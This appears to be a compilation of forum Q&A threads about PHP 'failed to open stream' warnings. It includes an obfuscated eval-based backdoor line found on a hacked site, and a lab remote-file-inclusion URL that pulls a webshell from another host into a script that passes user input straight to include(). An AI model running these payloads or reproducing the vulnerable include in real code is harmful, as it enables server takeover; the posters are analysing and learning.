I was randomly browsing a site on one of our servers, and I found this bit of code as the second line on index.php:
#preg_replace("\x24\50\x5b\136\x3c\135\x2b\51\x24\163\x69\145","\x65\166\x61\154\x28\47\x24\147\x63\155\x3d\67\x37\67\x37\61\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x67\143\x6d\75\x37\67\x37\67\x31\73","\x4c\62\x68\166\x62\127\x55\166\x59\62\x78\150\x63\63\x4e\160\x5a\155\x6b\166\x63\110\x56\151\x62\107\x6c\152\x58\62\x68\60\x62\127\x77\166\x62\107\x46\165\x5a\171\x39\152\x59\127\x4e\157\x5a\123\x38\165\x4a\124\x67\171\x4f\105\x55\154\x4d\104\x41\170\x4d\171\x56\103\x4f\105\x59\172\x4a\125\x4a\104\x4d\125\x49\154\x51\152\x49\171\x51\151\x55\60\x52\152\x55\63");
When I run it, I get:
Warning: file(/home/classifi/public_html/lang/cache/.%828E%0013%B8F3%BC1B%B22B%4F57): failed to open stream: No such file or directory
It looks like it's obfuscated to do something that it really shouldn't be doing. Can anyone explain to me how I can figure out what the intention was of this line of code? And whether or not my server was actually hacked?
What was the perpetrator trying to do? It is a site running NOAH CLASSIFIEDS script.
that is an hexa-coded text if you want to see the decoded version then see this
Decoded
Related
today after updating a piece of content on my WP website I've got this error showing up (instead of some icons images):
Warning: file_get_contents(http://example.com/wp-content/uploads/2020/03/icon-linkedin.svg): failed to open stream: Connection refused in /home/user/mywebsite/htdocs/wp-content/themes/theabnet/front-page.php on line 28
This is the screenshot of the code generating the error:
https://i.stack.imgur.com/Al7A6.png
The weird thing is that this never happened before and the edit I made was not involving icons or things directly connected with that navigation area.
Any help? (No strong coding skills unfortunately).
Any help? (No strong coding skills unfortunately).
Revert the changes and see if your website recovers.
You can try giving folder permission in your live server sometimes permission. If it is your own, try to re-register the domain (or) change the SVG icon link.
I think the domain name (mywebsite.com) of your requested SVG link is wrong. If it is your own, try to re-register domain (or) change SVG icon link.
PT 2...This is day 4 of still not figuring out this issue.
I am brand new to learning PHP. I keep receiving an error code when trying to run my code in google chrome. As seen here:
Warning: fopen(/var/www/html/orders.txt): failed to open stream: Permission denied in /var/www/html/class_projects/ch2/processorder.php on line 68
I have changed the permission on all of my files to r/w. I have run multiple terminal commands to change permissions. I think it's obvious at this point I am making big mistake somewhere. I'm at a loss of where to even look at this point.
I tried re-running the page after this action in the terminal. I still receive the same error code. What is my next best step in approaching this issue? I'm sure it's something I'm overlooking. Thanks for taking a look.
When i am trying to backdoor a web page given to me to find a specific file, upon requesting a shell i am given the following warnings on the page, and no other information is given. Should a shell pop up? I am kind of new to RFI and this is my first time working through it.
The link i used is:
http://10.102.x.x/description.php?page=http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php
The display when searching it was:
Warning: include(http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php): failed to open stream: Connection refused in /var/www/html/description.php on line 5
Warning: include(): Failed opening 'http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/description.php on line 5
description.php looks like this:
<?php
$image_name = $_GET['page'];
// Get the description from another file
include($image_name);
?>
What is the issue? I am sort of stuck.
Should i create a HTTP server to push my shell instead? I've read something about this but not sure what that entails
Even a link to an article is appreciated
I don't know how the php script looks like where you try go include the remote page, but it has to be something like:
$incfile = $_REQUEST["file"]; include($incfile.".php");
I am getting this message on my site, PHP Warning:
require_once() [function.require-once]: Unable to access /home/sddalmac/public_html/includes/defines.php in /home/sddalmac/public_html/index.php on line 28
After I restore defines.php file, site works fine for few hours and then file disappear again. Same is for user and for admin interface.
Server PHP version is: 5.3.29
Does anyone knows solution for this problem?
Yes, website is hacked. PHP exploit.
Reason: Known exploit = [Fingerprint Match] [PHP DarkLeech Exploit [P0990]]
Thanks to all.
so I'm trying implement a website which uses data stored in an xml file.
It works fine on my computer, but as soon as I try to upload it, I get the following error:
Warning: simplexml_load_file() [function.simplexml-load-file]: I/O warning : failed to load external entity "..\lib\menu.xml" in /home/ogwareco/public_html/menu.php on line 2
And none of the data gets displayed on the screen. I've Googled this problem, but it's led nowhere. I've got no idea what to do here. I've even tried to set my permissions to 777 (bad idea, I know), to see if it was a permissions thing, but it's not.
It looks like you are using backslashes to refer to the file on a Linux machine. Change
..\lib\menu.xml
to
../lib/menu.xml
in your code.